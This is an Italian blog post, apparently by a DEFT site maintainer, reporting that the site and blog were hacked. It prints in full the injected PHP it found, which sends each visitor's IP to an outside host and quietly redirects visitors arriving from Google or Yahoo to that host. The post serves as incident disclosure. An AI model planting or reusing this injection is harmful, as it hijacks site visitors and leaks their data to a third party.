Questa mattina sono stato informato da Enrico Ardizzoni che il sito di DEFT (e anche questo blog, l’ho appena scoperto) è stato oggetto di un attacco tipo quello descritto nel blog di Mario Pascucci.

Effettivamente in questi ultimi giorni avevo notato un netto calo degli accessi ma avevo attribuito la colpa alle feste che ormai stanno giungendo al termine. E invece no! Di seguito la simpatica injection:

<?php function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents(“http://google-stats.com/ip.php?ip=$ip”);if($uniq===false){return false;}if($uniq==”go”){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,”google”)!==false)and(strpos($ref,”bot.htm”)===false)){if(get_counter()){@header(“Location: http://google-stats.com/tds_u.php?dname=”.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,”yahoo”)!==false)and(strpos($ref,”slurp”)===false)){if(get_counter()){@header(“Location: http://google-stats.com/tds_u.php?dname=”.$_SERVER['HTTP_HOST']);die();}} ?>

Ho capito che è proprio in questi giorni che bisogna tenere la guardia ancora più alta evitando di “abbandonare” del tutto il mondo della rete proprio come ho fatto io.

Mannaggia mannaggia…. sti wafer non sanno proprio che fare :-)